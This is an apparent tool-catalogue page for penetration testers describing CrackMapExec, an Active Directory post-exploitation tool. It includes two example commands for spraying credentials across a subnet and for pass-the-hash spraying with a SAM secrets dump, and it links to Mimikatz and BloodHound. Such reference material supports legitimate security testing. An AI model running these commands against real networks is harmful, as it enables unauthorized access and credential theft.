provocativo_
back to the arsenal
// arsenal·Post-ExploitAdvancedFOSS

CrackMapExec/CME/

Swiss-army knife for AD post-exploitation — sprays credentials over SMB/WinRM/MSSQL/LDAP.

Post-Exploit

$ crackmapexec --help

CrackMapExec

// what it is

Description

Note: CrackMapExec is deprecated in favor of NetExec (nxc) as of 2023, but the workflow is identical. Sprays credentials across a subnet, enumerates shares, executes commands, dumps SAM and LSA secrets.

// use cases

What people use it for

  • Credential validation across an internal subnet
  • Bulk SAM/LSA dump
  • Pass-the-Hash spraying

// commands

The commands you'll type

Validate creds across subnet

$ crackmapexec smb 10.0.0.0/24 -u admin -p 'Password1!'

PtH spray + SAM dump

$ crackmapexec smb 10.0.0.0/24 -u admin -H <hash> --sam

// facts

category
Post-Exploit
platforms
LIN · WIN · MAC
license
FOSS
difficulty
Advanced

// links

// related in Post-Exploit

Post-ExploitAdvanced

Mimikatz

Benjamin Delpy's Windows credential-theft Swiss Army knife.

FOSS
WIN
open entry →
Post-ExploitAdvanced

Impacket

SecureAuth (now Fortra) Python toolkit for low-level Windows network protocols.

FOSS
LIN·WIN·MAC
open entry →
Post-ExploitAdvanced

BloodHound

Active Directory attack-path visualizer — graphs the shortest path to Domain Admin.

FOSS
LIN·WIN·MAC
open entry →